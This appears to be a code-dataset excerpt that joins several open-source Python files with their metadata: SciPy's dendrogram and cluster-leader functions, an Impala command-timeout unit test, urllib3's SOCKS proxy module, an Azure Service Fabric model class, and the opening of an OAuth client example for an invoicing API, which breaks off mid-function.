leaf_label_func : lambda or function, optional
When leaf_label_func is a callable function, it is called for
each leaf with cluster index :math:`k < 2n-1`, and it is
expected to return a string with the label for that leaf.
Indices :math:`k < n` correspond to original observations
while indices :math:`k \\geq n` correspond to non-singleton
clusters.
For example, to label singletons with their node id and
non-singletons with their id, count, and inconsistency
coefficient, simply do::
# First define the leaf label function.
def llf(id):
if id < n:
return str(id)
else:
return '[%d %d %1.2f]' % (id, count, R[n-id,3])
# The text for the leaf nodes is going to be big so force
# a rotation of 90 degrees.
dendrogram(Z, leaf_label_func=llf, leaf_rotation=90)
show_contracted : bool, optional
When True the heights of non-singleton nodes contracted
into a leaf node are plotted as crosses along the link
connecting that leaf node. This really is only useful when
truncation is used (see ``truncate_mode`` parameter).
link_color_func : callable, optional
If given, `link_color_func` is called with each non-singleton id
corresponding to each U-shaped link it will paint. The function is
expected to return the color to paint the link, encoded as a matplotlib
color string code. For example::
dendrogram(Z, link_color_func=lambda k: colors[k])
colors the direct links below each untruncated non-singleton node
``k`` using ``colors[k]``.
ax : matplotlib Axes instance, optional
If None and `no_plot` is not True, the dendrogram will be plotted
on the current axes. Otherwise if `no_plot` is not True the
dendrogram will be plotted on the given ``Axes`` instance. This can be
useful if the dendrogram is part of a more complex figure.
above_threshold_color : str, optional
This matplotlib color string sets the color of the links above the
color_threshold. The default is 'b'.
Returns
-------
R : dict
A dictionary of data structures computed to render the
dendrogram. It has the following keys:
``'color_list'``
A list of color names. The k'th element represents the color of the
k'th link.
``'icoord'`` and ``'dcoord'``
Each of them is a list of lists. Let ``icoord = [I1, I2, ..., Ip]``
where ``Ik = [xk1, xk2, xk3, xk4]`` and ``dcoord = [D1, D2, ..., Dp]``
where ``Dk = [yk1, yk2, yk3, yk4]``, then the k'th link painted is
``(xk1, yk1)`` - ``(xk2, yk2)`` - ``(xk3, yk3)`` - ``(xk4, yk4)``.
``'ivl'``
A list of labels corresponding to the leaf nodes.
``'leaves'``
For each i, ``H[i] == j``, cluster node ``j`` appears in position
``i`` in the left-to-right traversal of the leaves, where
:math:`j < 2n-1` and :math:`i < n`. If ``j`` is less than ``n``, the
``i``-th leaf node corresponds to an original observation.
Otherwise, it corresponds to a non-singleton cluster.
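Examples
--------
A minimal sketch that only computes the layout data (``no_plot=True``),
so matplotlib is not required; the distances are hypothetical:

>>> from scipy.cluster.hierarchy import linkage, dendrogram
>>> Z = linkage([2., 8., 10., 8., 10., 2.], method='single')
>>> R = dendrogram(Z, no_plot=True)
>>> len(R['ivl']), len(R['icoord'])   # one label per leaf, one link per merge
(4, 3)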
"""
# Features under consideration.
#
# ... = dendrogram(..., leaves_order=None)
#
# Plots the leaves in the order specified by a vector of
# original observation indices. If the vector contains duplicates
# or results in a crossing, an exception will be thrown. Passing
# None orders leaf nodes based on the order they appear in the
# pre-order traversal.
Z = np.asarray(Z, order='c')
if orientation not in ["top", "left", "bottom", "right"]:
raise ValueError("orientation must be one of 'top', 'left', "
"'bottom', or 'right'")
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
n = Zs[0] + 1
if type(p) in (int, float):
p = int(p)
else:
raise TypeError('The second argument must be a number')
if truncate_mode not in ('lastp', 'mlab', 'mtica', 'level', 'none', None):
raise ValueError('Invalid truncation mode.')
if truncate_mode == 'lastp' or truncate_mode == 'mlab':
if p > n or p == 0:
p = n
if truncate_mode == 'mtica' or truncate_mode == 'level':
if p <= 0:
p = np.inf
if get_leaves:
lvs = []
else:
lvs = None
icoord_list = []
dcoord_list = []
color_list = []
current_color = [0]
currently_below_threshold = [False]
if no_leaves:
ivl = None
else:
ivl = []
if color_threshold is None or \
(isinstance(color_threshold, string_types) and
color_threshold == 'default'):
color_threshold = max(Z[:, 2]) * 0.7
R = {'icoord': icoord_list, 'dcoord': dcoord_list, 'ivl': ivl,
'leaves': lvs, 'color_list': color_list}
if show_contracted:
contraction_marks = []
else:
contraction_marks = None
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=2 * n - 2, iv=0.0, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
if not no_plot:
mh = max(Z[:, 2])
_plot_dendrogram(icoord_list, dcoord_list, ivl, p, n, mh, orientation,
no_labels, color_list,
leaf_font_size=leaf_font_size,
leaf_rotation=leaf_rotation,
contraction_marks=contraction_marks,
ax=ax,
above_threshold_color=above_threshold_color)
return R
def _append_singleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
# If leaf node labels are to be displayed...
if ivl is not None:
# If a leaf_label_func has been provided, the label comes from the
# string returned from the leaf_label_func, which is a function
# passed to dendrogram.
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
# Otherwise, if the dendrogram caller has passed a labels list
# for the leaf nodes, use it.
if labels is not None:
ivl.append(labels[int(i - n)])
else:
# Otherwise, use the id as the label for the leaf.
ivl.append(str(int(i)))
def _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels, show_leaf_counts):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
if ivl is not None:
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
if show_leaf_counts:
ivl.append("(" + str(int(Z[i - n, 3])) + ")")
else:
ivl.append("")
def _append_contraction_marks(Z, iv, i, n, contraction_marks):
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _append_contraction_marks_sub(Z, iv, i, n, contraction_marks):
if i >= n:
contraction_marks.append((iv, Z[i - n, 2]))
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _dendrogram_calculate_info(Z, p, truncate_mode,
color_threshold=np.inf, get_leaves=True,
orientation='top', labels=None,
count_sort=False, distance_sort=False,
show_leaf_counts=False, i=-1, iv=0.0,
ivl=[], n=0, icoord_list=[], dcoord_list=[],
lvs=None, mhr=False,
current_color=[], color_list=[],
currently_below_threshold=[],
leaf_label_func=None, level=0,
contraction_marks=None,
link_color_func=None,
above_threshold_color='b'):
"""
Calculates the endpoints of the links as well as the labels for the
dendrogram rooted at the node with index i. iv is the independent
variable value to plot the left-most leaf node below the root node i
(if orientation='top', this would be the left-most x value where the
plotting of this root node i and its descendents should begin).
ivl is a list to store the labels of the leaf nodes. The leaf_label_func
is called whenever ivl != None, labels == None, and
leaf_label_func != None. When ivl != None and labels != None, the
labels list is used only for labeling the leaf nodes. When
ivl == None, no labels are generated for leaf nodes.
When get_leaves==True, a list of leaves is built as they are visited
in the dendrogram.
Returns a tuple with l being the independent variable coordinate that
corresponds to the midpoint of cluster to the left of cluster i if
i is non-singleton, otherwise the independent coordinate of the leaf
node if i is a leaf node.
Returns
-------
A tuple (left, w, h, md), where:
* left is the independent variable coordinate of the center of the
U of the subtree
* w is the amount of space used for the subtree (in independent
variable units)
* h is the height of the subtree in dependent variable units
* md is the max(Z[*,2]) for all nodes * below and including
the target node.
"""
if n == 0:
raise ValueError("Invalid singleton cluster count n.")
if i == -1:
raise ValueError("Invalid root cluster index i.")
if truncate_mode == 'lastp':
# If the node is a leaf node but corresponds to a non-singleton cluster,
# its label is either the empty string or the number of original
# observations belonging to cluster i.
if i < 2 * n - p and i >= n:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mtica', 'level'):
if i > n and level > p:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mlab',):
pass
# Otherwise, only truncate if we have a leaf node.
#
# If the truncate_mode is mlab, the linkage has been modified
# with the truncated tree.
#
# Only place leaves if they correspond to original observations.
if i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
# !!! Otherwise, we don't have a leaf node, so work on plotting a
# non-leaf node.
# Actual indices of a and b
aa = int(Z[i - n, 0])
ab = int(Z[i - n, 1])
if aa > n:
# The number of singletons below cluster a
na = Z[aa - n, 3]
# The distance between a's two direct children.
da = Z[aa - n, 2]
else:
na = 1
da = 0.0
if ab > n:
nb = Z[ab - n, 3]
db = Z[ab - n, 2]
else:
nb = 1
db = 0.0
if count_sort == 'ascending' or count_sort == True:
# If a has a count greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if na > nb:
# The cluster index to draw to the left (ua) will be ab
# and the one to draw to the right (ub) will be aa
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif count_sort == 'descending':
# If a has a count less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if na > nb:
ua = aa
ub = ab
else:
ua = ab
ub = aa
elif distance_sort == 'ascending' or distance_sort == True:
# If a has a distance greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if da > db:
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif distance_sort == 'descending':
# If a has a distance less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if da > db:
ua = aa
ub = ab
else:
ua = ab
ub = aa
else:
ua = aa
ub = ab
# Updated iv variable and the amount of space used.
(uiva, uwa, uah, uamd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ua, iv=iv, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
h = Z[i - n, 2]
if h >= color_threshold or color_threshold <= 0:
c = above_threshold_color
if currently_below_threshold[0]:
current_color[0] = (current_color[0] + 1) % len(_link_line_colors)
currently_below_threshold[0] = False
else:
currently_below_threshold[0] = True
c = _link_line_colors[current_color[0]]
(uivb, uwb, ubh, ubmd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ub, iv=iv + uwa, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
max_dist = max(uamd, ubmd, h)
icoord_list.append([uiva, uiva, uivb, uivb])
dcoord_list.append([uah, h, h, ubh])
if link_color_func is not None:
v = link_color_func(int(i))
if not isinstance(v, string_types):
raise TypeError("link_color_func must return a matplotlib "
"color string!")
color_list.append(v)
else:
color_list.append(c)
return (((uiva + uivb) / 2), uwa + uwb, h, max_dist)
def is_isomorphic(T1, T2):
"""
Determines if two different cluster assignments are equivalent.
Parameters
----------
T1 : array_like
An assignment of singleton cluster ids to flat cluster ids.
T2 : array_like
An assignment of singleton cluster ids to flat cluster ids.
Returns
-------
b : bool
Whether the flat cluster assignments `T1` and `T2` are
equivalent.
"""
T1 = np.asarray(T1, order='c')
T2 = np.asarray(T2, order='c')
if type(T1) != np.ndarray:
raise TypeError('T1 must be a numpy array.')
if type(T2) != np.ndarray:
raise TypeError('T2 must be a numpy array.')
T1S = T1.shape
T2S = T2.shape
if len(T1S) != 1:
raise ValueError('T1 must be one-dimensional.')
if len(T2S) != 1:
raise ValueError('T2 must be one-dimensional.')
if T1S[0] != T2S[0]:
raise ValueError('T1 and T2 must have the same number of elements.')
n = T1S[0]
d = {}
for i in xrange(0, n):
if T1[i] in d:
if d[T1[i]] != T2[i]:
return False
else:
d[T1[i]] = T2[i]
return True
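# A minimal sketch of the equivalence check above (hypothetical assignments):
# both labelings below induce the same partition, just with different ids.
#
#     is_isomorphic([1, 1, 2, 2, 3], [9, 9, 4, 4, 7])   # -> True
#     is_isomorphic([1, 1, 2, 2, 3], [9, 4, 4, 4, 7])   # -> False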
def maxdists(Z):
"""
Returns the maximum distance between any non-singleton cluster.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
Returns
-------
maxdists : ndarray
A ``(n-1)`` sized numpy array of doubles; ``MD[i]`` represents
the maximum distance between any cluster (including
singletons) below and including the node with index i. More
specifically, ``MD[i] = Z[Q(i)-n, 2].max()`` where ``Q(i)`` is the
set of all node indices below and including node i.
"""
Z = np.asarray(Z, order='c', dtype=np.double)
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
MD = np.zeros((n - 1,))
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.get_max_dist_for_each_cluster(Z, MD, int(n))
return MD
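# A minimal usage sketch, assuming ``X`` is a hypothetical observation matrix
# and ``linkage`` is the linkage function defined earlier in this module:
#
#     Z = linkage(X, method='single')
#     MD = maxdists(Z)    # MD[i] is the largest merge distance below node n+i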
def maxinconsts(Z, R):
"""
Returns the maximum inconsistency coefficient for each
non-singleton cluster and its descendents.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : ndarray
The inconsistency matrix.
Returns
-------
MI : ndarray
A monotonic ``(n-1)``-sized numpy array of doubles.
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
n = Z.shape[0] + 1
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
MI = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MI, int(n), 3)
return MI
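# A minimal usage sketch, assuming ``Z`` is a linkage matrix and using the
# ``inconsistent`` function defined earlier in this module:
#
#     R = inconsistent(Z)
#     MI = maxinconsts(Z, R)   # MI[i]: max inconsistency coefficient below node n+i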
def maxRstat(Z, R, i):
"""
Returns the maximum statistic for each non-singleton cluster and
its descendents.
Parameters
----------
Z : array_like
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : array_like
The inconsistency matrix.
i : int
The column of `R` to use as the statistic.
Returns
-------
MR : ndarray
Calculates the maximum statistic for the i'th column of the
inconsistency matrix `R` for each non-singleton cluster
node. ``MR[j]`` is the maximum over ``R[Q(j)-n, i]`` where
``Q(j)`` the set of all node ids corresponding to nodes below
and including ``j``.
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
if type(i) is not int:
raise TypeError('The third argument must be an integer.')
if i < 0 or i > 3:
raise ValueError('i must be an integer between 0 and 3 inclusive.')
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
n = Z.shape[0] + 1
MR = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MR, int(n), i)
return MR
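# Column 3 of the inconsistency matrix holds the inconsistency coefficient,
# so the following sketch is equivalent to maxinconsts(Z, R):
#
#     MR = maxRstat(Z, R, 3)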
def leaders(Z, T):
"""
Returns the root nodes in a hierarchical clustering.
Returns the root nodes in a hierarchical clustering corresponding
to a cut defined by a flat cluster assignment vector ``T``. See
the ``fcluster`` function for more information on the format of ``T``.
For each flat cluster :math:`j` of the :math:`k` flat clusters
represented in the n-sized flat cluster assignment vector ``T``,
this function finds the lowest cluster node :math:`i` in the linkage
tree Z such that:
* leaf descendents belong only to flat cluster j
(i.e. ``T[p]==j`` for all :math:`p` in :math:`S(i)` where
:math:`S(i)` is the set of leaf ids of leaf nodes descendent
with cluster node :math:`i`)
* there does not exist a leaf that is not descendent with
:math:`i` that also belongs to cluster :math:`j`
(i.e. ``T[q]!=j`` for all :math:`q` not in :math:`S(i)`). If
this condition is violated, ``T`` is not a valid cluster
assignment vector, and an exception will be thrown.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
T : ndarray
The flat cluster assignment vector.
Returns
-------
L : ndarray
The leader linkage node id's stored as a k-element 1-D array
where ``k`` is the number of flat clusters found in ``T``.
``L[j]=i`` is the linkage cluster node id that is the
leader of flat cluster with id M[j]. If ``i < n``, ``i``
corresponds to an original observation, otherwise it
corresponds to a non-singleton cluster.
For example: if ``L[3]=2`` and ``M[3]=8``, the flat cluster with
id 8's leader is linkage node 2.
M : ndarray
The leader linkage node id's stored as a k-element 1-D array where
``k`` is the number of flat clusters found in ``T``. This allows the
set of flat cluster ids to be any arbitrary set of ``k`` integers.
"""
Z = np.asarray(Z, order='c')
T = np.asarray(T, order='c')
if type(T) != np.ndarray or T.dtype != 'i':
raise TypeError('T must be a one-dimensional numpy array of integers.')
is_valid_linkage(Z, throw=True, name='Z')
if len(T) != Z.shape[0] + 1:
raise ValueError('Mismatch: len(T)!=Z.shape[0] + 1.')
Cl = np.unique(T)
kk = len(Cl)
L = np.zeros((kk,), dtype='i')
M = np.zeros((kk,), dtype='i')
n = Z.shape[0] + 1
[Z, T] = _copy_arrays_if_base_present([Z, T])
s = _hierarchy.leaders(Z, T, L, M, int(kk), int(n))
if s >= 0:
raise ValueError(('T is not a valid assignment vector. Error found '
'when examining linkage node %d (< 2n-1).') % s)
return (L, M)
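# A minimal usage sketch, assuming ``Z`` is a linkage matrix over n observations
# and using the ``fcluster`` function defined earlier in this module:
#
#     T = fcluster(Z, 3, criterion='maxclust')   # flat clustering with at most 3 clusters
#     L, M = leaders(Z, T)                       # L[j] is the leader node of flat cluster M[j]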
# These are test functions to help me test the leaders function.
def _leaders_test(Z, T):
tr = to_tree(Z)
_leaders_test_recurs_mark(tr, T)
return tr
def _leader_identify(tr, T):
if tr.is_leaf():
return T[tr.id]
else:
left = tr.get_left()
right = tr.get_right()
lfid = _leader_identify(left, T)
rfid = _leader_identify(right, T)
print('ndid: %d lid: %d lfid: %d rid: %d rfid: %d'
% (tr.get_id(), left.get_id(), lfid, right.get_id(), rfid))
if lfid != rfid:
if lfid != -1:
print('leader: %d with tag %d' % (left.id, lfid))
if rfid != -1:
print('leader: %d with tag %d' % (right.id, rfid))
return -1
else:
return lfid
def _leaders_test_recurs_mark(tr, T):
if tr.is_leaf():
tr.asgn = T[tr.id]
else:
tr.asgn = -1
_leaders_test_recurs_mark(tr.left, T)
_leaders_test_recurs_mark(tr.right, T)
| bsd-3-clause | 6,255,493,199,539,831,000 | 32.899373 | 155 | 0.588742 | false |
cloudera/Impala | tests/unittests/test_command.py | 2 | 1791 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Unit tests for collect_diagnostics.Command
import os
import pytest
import sys
# Update the sys.path to include the modules from bin/diagnostics.
sys.path.insert(0,
os.path.abspath(os.path.join(os.path.dirname(__file__), '../../bin/diagnostics')))
from collect_diagnostics import Command
class TestCommand(object):
""" Unit tests for the Command class"""
def test_simple_commands(self):
# Successful command
c = Command(["echo", "foo"], 1000)
assert c.run() == 0, "Command expected to succeed, but failed"
assert c.stdout.strip("\n") == "foo"
# Failed command, check return code
c = Command(["false"], 1000)
assert c.run() == 1
def test_command_timer(self):
# Try to run a command that sleeps for 1000s and set a
    # timer for 1 second. The command should time out.
c = Command(["sleep", "1000"], 1)
assert c.run() != 0, "Command expected to timeout but succeeded."
assert c.child_killed_by_timeout, "Command didn't timeout as expected."
| apache-2.0 | -3,043,633,197,999,597,600 | 35.55102 | 86 | 0.717476 | false |
danielecook/gist-alfred | urllib3/contrib/socks.py | 5 | 6386 | # -*- coding: utf-8 -*-
"""
This module contains provisional support for SOCKS proxies from within
urllib3. This module supports SOCKS4 (specifically the SOCKS4A variant) and
SOCKS5. To enable its functionality, either install PySocks or install this
module with the ``socks`` extra.
The SOCKS implementation supports the full range of urllib3 features. It also
supports the following SOCKS features:
- SOCKS4
- SOCKS4a
- SOCKS5
- Usernames and passwords for the SOCKS proxy
Known Limitations:
- Currently PySocks does not support contacting remote websites via literal
IPv6 addresses. Any such connection attempt will fail. You must use a domain
name.
- Currently PySocks does not support IPv6 connections to the SOCKS proxy. Any
such connection attempt will fail.
"""
from __future__ import absolute_import
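# A minimal usage sketch of the manager defined below (proxy address and
# target URL are hypothetical):
#
#     proxy = SOCKSProxyManager('socks5h://localhost:1080/')
#     response = proxy.request('GET', 'http://example.org/')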
try:
import socks
except ImportError:
import warnings
from ..exceptions import DependencyWarning
warnings.warn((
'SOCKS support in urllib3 requires the installation of optional '
'dependencies: specifically, PySocks. For more information, see '
'https://urllib3.readthedocs.io/en/latest/contrib.html#socks-proxies'
),
DependencyWarning
)
raise
from socket import error as SocketError, timeout as SocketTimeout
from ..connection import (
HTTPConnection, HTTPSConnection
)
from ..connectionpool import (
HTTPConnectionPool, HTTPSConnectionPool
)
from ..exceptions import ConnectTimeoutError, NewConnectionError
from ..poolmanager import PoolManager
from ..util.url import parse_url
try:
import ssl
except ImportError:
ssl = None
class SOCKSConnection(HTTPConnection):
"""
A plain-text HTTP connection that connects via a SOCKS proxy.
"""
def __init__(self, *args, **kwargs):
self._socks_options = kwargs.pop('_socks_options')
super(SOCKSConnection, self).__init__(*args, **kwargs)
def _new_conn(self):
"""
Establish a new connection via the SOCKS proxy.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = socks.create_connection(
(self.host, self.port),
proxy_type=self._socks_options['socks_version'],
proxy_addr=self._socks_options['proxy_host'],
proxy_port=self._socks_options['proxy_port'],
proxy_username=self._socks_options['username'],
proxy_password=self._socks_options['password'],
proxy_rdns=self._socks_options['rdns'],
timeout=self.timeout,
**extra_kw
)
except SocketTimeout:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except socks.ProxyError as e:
# This is fragile as hell, but it seems to be the only way to raise
# useful errors here.
if e.socket_err:
error = e.socket_err
if isinstance(error, SocketTimeout):
raise ConnectTimeoutError(
self,
"Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout)
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % error
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % e
)
except SocketError as e: # Defensive: PySocks should catch all these.
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
# We don't need to duplicate the Verified/Unverified distinction from
# urllib3/connection.py here because the HTTPSConnection will already have been
# correctly set to either the Verified or Unverified form by that module. This
# means the SOCKSHTTPSConnection will automatically be the correct type.
class SOCKSHTTPSConnection(SOCKSConnection, HTTPSConnection):
pass
class SOCKSHTTPConnectionPool(HTTPConnectionPool):
ConnectionCls = SOCKSConnection
class SOCKSHTTPSConnectionPool(HTTPSConnectionPool):
ConnectionCls = SOCKSHTTPSConnection
class SOCKSProxyManager(PoolManager):
"""
A version of the urllib3 ProxyManager that routes connections via the
defined SOCKS proxy.
"""
pool_classes_by_scheme = {
'http': SOCKSHTTPConnectionPool,
'https': SOCKSHTTPSConnectionPool,
}
def __init__(self, proxy_url, username=None, password=None,
num_pools=10, headers=None, **connection_pool_kw):
parsed = parse_url(proxy_url)
if username is None and password is None and parsed.auth is not None:
split = parsed.auth.split(':')
if len(split) == 2:
username, password = split
if parsed.scheme == 'socks5':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = False
elif parsed.scheme == 'socks5h':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = True
elif parsed.scheme == 'socks4':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = False
elif parsed.scheme == 'socks4a':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = True
else:
raise ValueError(
"Unable to determine SOCKS version from %s" % proxy_url
)
self.proxy_url = proxy_url
socks_options = {
'socks_version': socks_version,
'proxy_host': parsed.host,
'proxy_port': parsed.port,
'username': username,
'password': password,
'rdns': rdns
}
connection_pool_kw['_socks_options'] = socks_options
super(SOCKSProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw
)
self.pool_classes_by_scheme = SOCKSProxyManager.pool_classes_by_scheme
| mit | 9,006,006,380,867,902,000 | 32.260417 | 79 | 0.612903 | false |
AutorestCI/azure-sdk-for-python | azure-servicefabric/azure/servicefabric/models/chaos_context_map_item.py | 1 | 1090 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ChaosContextMapItem(Model):
"""Describes an item in the ChaosContextMap in ChaosParameters.
:param key: The key for a ChaosContextMapItem.
:type key: str
:param value: The value for a ChaosContextMapItem.
:type value: str
"""
_validation = {
'key': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'key': {'key': 'Key', 'type': 'str'},
'value': {'key': 'Value', 'type': 'str'},
}
def __init__(self, key, value):
self.key = key
self.value = value
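# A minimal usage sketch (the key/value strings are hypothetical):
#
#     item = ChaosContextMapItem(key='NodeTypeFilter', value='FrontEndNodes')
#     # msrest serializes it via _attribute_map as {'Key': ..., 'Value': ...}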
| mit | -7,523,740,089,934,637,000 | 28.459459 | 76 | 0.544954 | false |
mirumee/python-invoicible | examples/cli.py | 1 | 7581 | import cmd
import copy
import httplib
import oauth.oauth as oauth
import pprint
import readline
import sys
import urlparse
import webbrowser
import invoicible
# key and secret granted by the service provider for this consumer application
CONSUMER_KEY = ''
CONSUMER_SECRET_KEY = ''
# access token for this consumer application which allows access to user resources
ACCESS_TOKEN_KEY = ''
ACCESS_TOKEN_SECRET = ''
COMPANY_DOMAIN = ''
def ask(question):
while True:
result = raw_input(question)
if result.lower() in ('y', 'yes', ''):
return True
elif result.lower() in ('n', 'no'):
return False
class InvoicibleOAuthHelper(oauth.OAuthClient):
"""
    This is a helper for OAuth authorization. If you are going to create your own
    client, you should check the logic of the authorize method.
"""
request_token_path = '/oauth/request/token/'
access_token_path = '/oauth/access/token/'
authorization_path = '/oauth/autoryzacja/'
def __init__(self, consumer_key, consumer_secret, company_domain):
self.company_domain = company_domain
self.connection = httplib.HTTPSConnection(self.company_domain)
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method_hmac_sha1 = oauth.OAuthSignatureMethod_HMAC_SHA1()
def authorize(self):
request_token = self.fetch_request_token()
verifier = self.authorize_token(request_token)
access_token = self.fetch_access_token(verifier)
return access_token
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
http_url=urlparse.urlunparse(("https", self.company_domain, self.request_token_path, None, None, None))
)
oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, None)
self.connection.request(
oauth_request.http_method,
self.request_token_path,
headers=oauth_request.to_header()
)
response = self.connection.getresponse()
self._request_token = oauth.OAuthToken.from_string(response.read())
return self._request_token
def fetch_verifier(self, url):
webbrowser.open_new(url)
        verifier = raw_input('Copy the verifier which you should see on the page after authorization:')
return verifier
def authorize_token(self, request_token):
oauth_request = oauth.OAuthRequest.from_token_and_callback(
token=request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.authorization_path, None, None, None))
)
self._verifier = self.fetch_verifier(oauth_request.to_url())
return self._verifier
def fetch_access_token(self, verifier=None):
self._request_token.verifier = verifier
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
token=self._request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.access_token_path, None, None, None))
)
